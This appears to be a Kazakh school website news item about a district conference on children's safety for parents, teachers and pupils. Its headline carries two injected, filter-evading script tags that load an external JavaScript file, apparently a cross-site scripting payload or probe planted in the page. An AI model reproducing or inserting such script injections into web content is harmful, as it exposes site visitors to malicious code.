"Балалар қауіпсіздігі" тақырыбында конференция өткізілді<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.10.2022 12 қазан күні "Тасты ауылының ЖОББМ" КММ -не "Ақмешіт ауылының ЖОББМ"КММ -нің психологі және Целиноград ауданының орта білім беретін мектептерінің педагог - психолог тренері Балғожина Айбала Рустемовна аудандық көлемде балалардың өмірін қамтамасыз ету мақсатында "Бала қауіпсіздігі" тақырыбында конференция өткізді. Конференцияға ата - аналар мен ұстаздар және оқушылар қатысып, белсенділік танытты. Бала өмірінің қауіпсіздігі маңызды.Отбасы тәрбиесінің негізгі мақсаты – дені сау, ұлттық сана - сезімі оянған, рухани ойлау дәрежесі биік, мәдениетті, парасатты, ар - ожданы мол, еңбекқор, білімді азаматты тәрбиелеу. Бала да жас терек сияқты, қалай тәрбиелесең, жастан қандай тәрбие берсең, ертең есейгенде жас кезіндегі алған тәрбиесі өміріне негіз болмақ. Ата - ана бала қауіпсіздігін сақтауды ең бірінші орынға қою керек. Бала есейген сайын өз бетінше жүруге құмар болады. Ал ата-аналардың міндеті — баланы өрт кезінде, немесе күмәнді адамдармен кездесу сияқты қауіпті жағдайларда өзін қалай ұстауы керек және не істеуі керек екенін түсіндіріп, үйрету.
Просмотров: 312


Пікір қосу



Деректерді қолтаңбаға қосу